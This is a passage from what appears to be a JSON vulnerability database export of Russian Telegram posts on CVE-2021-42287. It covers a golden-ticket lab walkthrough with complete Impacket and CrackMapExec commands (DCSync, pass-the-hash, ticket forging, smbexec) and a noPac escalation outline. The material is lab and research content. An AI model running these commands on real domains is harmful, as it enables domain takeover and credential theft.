\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0433\u0440\u0443\u043f\u043f\u0430\u0445, \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u0445 \u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0430\u0445, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u044e.\n\n\u0412\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u044f\u0441\u044c \u043a \u043f\u0430\u0442\u0447\u0443, Microsoft \u043e\u0431\u043d\u043e\u0432\u0438\u043b\u0430 PAC, \u0434\u043e\u0431\u0430\u0432\u0438\u0432 \u0434\u0432\u0435 \u043d\u043e\u0432\u044b\u0435 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0434\u0430\u043d\u043d\u044b\u0445: PAC_ATTRIBUTES_INFO \u0438 PAC_REQUESTOR. \u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0439 \u0447\u0430\u0441\u0442\u044c\u044e \u043f\u0430\u0442\u0447\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043e\u0439 PAC_REQUESTOR. \u0421 \u0435\u0451 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435\u043c KDC \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f (\u043a\u043b\u0438\u0435\u043d\u0442\u0430) \u0432 \u0431\u0438\u043b\u0435\u0442\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0437\u0440\u0435\u0448\u0430\u0435\u0442\u0441\u044f \u0432 SID, \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0439 \u0432 PAC. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0441 \u043e\u043a\u0442\u044f\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430 \u043b\u044e\u0431\u043e\u0439 \u0431\u0438\u043b\u0435\u0442 \u0431\u0435\u0437 \u043d\u043e\u0432\u043e\u0439 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b PAC (\u0438\u043b\u0438 \u0431\u0438\u043b\u0435\u0442 \u0434\u043b\u044f \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f) \u0431\u0443\u0434\u0435\u0442 \u043e\u0442\u043a\u043b\u043e\u043d\u0435\u043d. \u0415\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0435\u0441\u043b\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e.\n\u0412 \u044d\u0442\u043e\u043c \u0438 \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0441\u0443\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u044b \u043c\u043e\u0433\u043b\u0438 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u0432\u044b\u0448\u0435.\n\n\u0412\u043c\u0435\u0441\u0442\u0435 \u0441 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u043e\u0434\u0445\u043e\u0434 \u043a \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044e \u0437\u043e\u043b\u043e\u0442\u044b\u0445 \u0431\u0438\u043b\u0435\u0442\u043e\u0432 \u0442\u043e\u0436\u0435 \u0438\u0437\u043c\u0435\u043d\u0438\u043b\u0441\u044f. \u041c\u044b \u043d\u0435 \u043c\u043e\u0436\u0435\u043c \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c Golden Ticket \u0434\u043b\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043d\u043e \u043c\u043e\u0436\u0435\u043c \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c!\n\u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 Impacket!\napt install python3-impacket\n\u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0431\u0438\u043b\u0435\u0442 \u043c\u043e\u0436\u043d\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439:\npython3 ticketer.py -aesKey $krbtgtAESkey -domain-sid $domainSID -domain $DOMAIN -user-id 1000 validuser\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043e\u0431\u0440\u0430\u0442\u043d\u0430\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u043e \u0441\u0442\u0430\u0440\u044b\u043c PAC \u0442\u0430\u043a \u0436\u0435 \u043e\u0441\u0442\u0430\u043d\u0435\u0442\u0441\u044f:\npython3 ticketer.py -nthash $krbtgtRC4key -domain-sid $domainSID -domain $DOMAIN -old-pac username\n\n\u041f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u043c\u0435\u0440 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f Golden Ticket \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u0443\u0436\u0435 \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043d\u043d\u043e\u0439 \u043c\u043d\u043e\u0439 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u043d\u043e\u0439 Kingdom \u0441 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Codeby.Games:\n# \u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c SID \u0434\u043e\u043c\u0435\u043d\u0430:\nimpacket-lookupsid codeby.cdb/administrator:'Not_alon3'@192.168.2.4\n\n# \u0414\u0435\u043b\u0430\u0435\u043c DCSync, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043a\u043b\u044e\u0447\u0438 \u0443\u0447\u0435\u0442\u043a\u0438 krbtgt:\nimpacket-secretsdump codeby.cdb/administrator:'Not_alon3'@192.168.2.4 -just-dc-user krbtgt\n\n# \u041e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u043c RID-\u0431\u0440\u0443\u0442\u0444\u043e\u0440\u0441 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0430\u0440 RID+user (\u0442\u0443\u0442 \u044f \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b Pass-the-Hash):\ncrackmapexec smb 192.168.2.4 -u Administrator -H 3c3d0f466260c126a80abe255cdfffad --rid-brute\n\n# \u0412\u044b\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0431\u0438\u043b\u0435\u0442:\nimpacket-ticketer -aesKey\nc8a4d26bcf29ff5cd29882308907b5536af9857de7cbfb4c1bf1cd789b3799d2 -domain-sid S-1-5-21-1870022127-3338747641-451296598 -domain codeby.cdb -user-id 1105 amaslova\n\n# \u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0437\u0430\u043f\u0438\u0441\u044c \u0432 /etc/hosts, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e Kerberos \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u0438\u043c\u0435\u043d\u0430\u043c\u0438 \u0441\u043b\u0443\u0436\u0431:\necho '192.168.2.4 kingdom.codeby.cdb kingdom codeby.cdb' >> /etc/hosts\n\n# \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c smbexec \u0441 \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u043c \u0437\u043e\u043b\u043e\u0442\u044b\u043c \u0431\u0438\u043b\u0435\u0442\u043e\u043c:\nexport KRB5CCNAME=amaslova.ccache\nimpacket-smbexec codeby.cdb/amaslova@kingdom.codeby.cdb -k -no-pass\n\n\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u043d\u0430 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0445 \u043a \u043f\u043e\u0441\u0442\u0443 (\u043d\u0438\u0436\u0435) \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u0430\u0445. \u041d\u0430 \u043f\u0435\u0440\u0432\u043e\u043c \u0438\u0437 \u043d\u0438\u0445 \u0432\u0438\u0434\u043d\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0430 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0431\u0438\u043b\u0435\u0442 \u043d\u0430 \u043d\u0435\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0430 \u043d\u0430 \u0432\u0442\u043e\u0440\u043e\u043c \u2014 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0437\u043e\u043b\u043e\u0442\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043b\u044f \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 amaslova!", "creation_timestamp": "2024-04-06T07:44:05.000000Z"}, {"uuid": "c6a3d764-f72a-429b-a901-5325d8027174", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/poxek/1578", "content": "NoPacScan\n\u042d\u0442\u043e \u0441\u043a\u0430\u043d\u0435\u0440 CVE-2021-42287/CVE-2021-42278, \u043e\u043d \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0435 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u043e\u0432 \u0434\u043e\u043c\u0435\u043d\u0430, \u0447\u0435\u043c \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442, \u0438 \u0431\u043e\u043b\u0435\u0435 \u0442\u043e\u0447\u0435\u043d, \u0447\u0435\u043c \u043e\u043d. \u041e\u043d \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u0442 DC \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e DNS \u043f\u043e\u0438\u0441\u043a\u0430 _msdcs.aaa.com, \u044d\u0442\u043e \u043b\u0443\u0447\u0448\u0435, \u0447\u0435\u043c LDAP \u0438 SAMR, \u0438 \u043e\u043d \u0431\u0443\u0434\u0435\u0442 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0441\u0435 DC, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u044b \u043d\u0430\u0445\u043e\u0434\u0438\u043c. \u0415\u0441\u043b\u0438 \u0432\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0435 LDAP \u0438\u043b\u0438 SAMR, \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0432\u044b \u043f\u0440\u043e\u043f\u0443\u0441\u0442\u0438\u0442\u0435 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 DC, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u044b \u0438\u0437 Primary DC. \u0414\u043b\u044f \u0431\u043e\u043b\u044c\u0448\u0435\u0439 \u0442\u043e\u0447\u043d\u043e\u0441\u0442\u0438, \u043e\u043d \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u0442 Pac, \u0433\u0434\u0435 \u0442\u0438\u043f \u0440\u0430\u0432\u0435\u043d 0x10, \u0447\u0442\u043e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u043f\u0430\u0442\u0447\u0435\u043c Microsoft \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\nhttps://github.com/knightswd/NoPacScan\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-05-19T07:01:56.000000Z"}, {"uuid": "5e372a6c-cd4c-44e9-9e70-05db38c4c49a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/monkey_hacker/54", "content": "Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)\n\n\u0422\u0430\u043a\u043e\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 \u0434\u0432\u0430 \u0433\u043e\u0434\u0430, \u043e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u043e\u0442 \u0441\u043f\u043e\u0441\u043e\u0431 \u0430\u043a\u0442\u0443\u0430\u043b\u0435\u043d \u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439. \u0410 \u043a\u0430\u043a\u0438\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b \u043e\u043d\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442?\n\n1. \u041f\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0443 \u0432 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445, \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0434\u043e\u043c\u0435\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u0438\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u043a AD \u0442\u043e\u043b\u044c\u043a\u043e 10 \u0440\u0430\u0437. \n\u0427\u0442\u043e\u0431\u044b \u044d\u0442\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443:\n\nGet-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota\n\n\u0427\u0442\u043e\u0431\u044b \u043e\u0442\u043b\u0438\u0447\u0430\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e\u0442 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432, \u043e\u043d\u0438 \u0434\u043e\u043b\u0436\u043d\u044b \u0438\u043c\u0435\u0442\u044c \u0432 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0435 sAMAccountName \u043d\u0430 \u043a\u043e\u043d\u0446\u0435 $. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u0440\u0438\u043a\u043e\u043b \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0441\u0438\u043c\u0432\u043e\u043b \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f. \u0410\u0442\u0440\u0438\u0431\u0443\u0442\u043e\u043c \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f sAMAccountName. \u042d\u0442\u043e\u0442 \u0430\u0442\u0440\u0438\u0431\u0443\u0442 \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0438 \u043e\u0442\u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u0440\u0443\u0447\u043d\u0443\u044e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e ADSIEdit Tool\n\n2. \u041f\u0440\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0435 \u0431\u0438\u043b\u0435\u0442\u0430 \u043d\u0430 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0435 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043f\u0440\u0435\u0434\u044a\u044f\u0432\u0438\u0442\u044c TGT. \u0415\u0441\u043b\u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 \u043d\u0435 \u043d\u0430\u0439\u0434\u0435\u043d KDC, KDC \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u044b\u0439 \u043f\u043e\u0438\u0441\u043a \u0441 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c $. \u0415\u0441\u043b\u0438 TGT \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u0434\u043b\u044f username, \u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c username \u0443\u0434\u0430\u043b\u0435\u043d, \u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u044d\u0442\u043e\u0442 TGT \u0434\u043b\u044f \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u043d\u043e\u0433\u043e \u0431\u0438\u043b\u0435\u0442\u0430 \u0434\u043b\u044f \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0447\u0435\u0440\u0435\u0437  S4U2self  \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e KDC \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043a\u0430\u0442\u044c username$ \u0432 AD. \n\n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u044f\u044f \u044d\u0442\u0438 \u0432\u0443\u043b\u043d\u044b, \u043c\u044b \u0438\u043c\u0435\u0435\u043c \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a\u043e\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 TGT. \u0417\u0430\u0442\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u0430\u0442\u044c\u0441\u044f \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0438\u043b\u0438 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u0442\u044c \u0438\u0441\u0445\u043e\u0434\u043d\u0443\u044e \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430. \u041f\u043e\u043b\u0443\u0447\u0438\u0432 TGT, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043d\u0430\u0447\u0430\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c sAMAccountName. \u0410 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0437\u043d\u0430\u044f, \u0447\u0442\u043e KDC \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u0438\u043a\u0435\u0442\u044b \u0438 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u0441\u0435\u0430\u043d\u0441\u043e\u0432\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430\u043c \u0432 \u0434\u043e\u043c\u0435\u043d\u0435, \u043c\u044b \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439\n\n\u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0442\u0430\u043a:\n\n1. \u0412 \u0434\u043e\u043c\u0435\u043d \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n2. \u0421\u043e\u0437\u0434\u0430\u043d\u043d\u0430\u044f \u0443\u0447\u0435\u0442\u043d\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0438\u0438 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430\n3. \u0417\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f Kerberos TGT \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u043c\u0435\u043d\u0438 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.\n4. \u0421\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0435 \u0438\u043c\u044f \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u0441\u043d\u043e\u0432\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0435  \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435.\n5. \u0421\u0435\u0440\u0432\u0438\u0441\u043d\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 Kerberos \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f S4U2self\n\n\u0417\u0432\u0443\u0447\u0438\u0442 \u0434\u0443\u0448\u043d\u043e, \u0431\u043b\u0430\u0433\u043e \u0435\u0441\u0442\u044c noPac, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443\n\nTHX:\n\nhttps://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html\n\nhttps://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml\n\nhttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2023-03-16T11:56:00.000000Z"}, {"uuid": "7fdd9d4d-9b4f-4b9e-9a08-0c78275eca11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2147", "content": "\u0421\u043f\u0443\u0444\u0438\u043d\u0433 sAMAccountName: \u043e\u0442 LowPriv \u0434\u043e \u0434\u043e\u043c\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u0437\u0430 \u0448\u0435\u0441\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0427\u0430\u0440\u043b\u0438 \u041a\u043b\u0430\u0440\u043a (@exploitph, \u0438\u0437\u0432\u0435\u0441\u0442\u0435\u043d \u0441\u0432\u043e\u0438\u043c \u0444\u043e\u0440\u043a\u043e\u043c PowerView) \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u0441\u0432\u0435\u0436\u0438\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u044d\u0441\u043a\u0430\u043b\u0430\u0446\u0438\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435 Active Directory, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 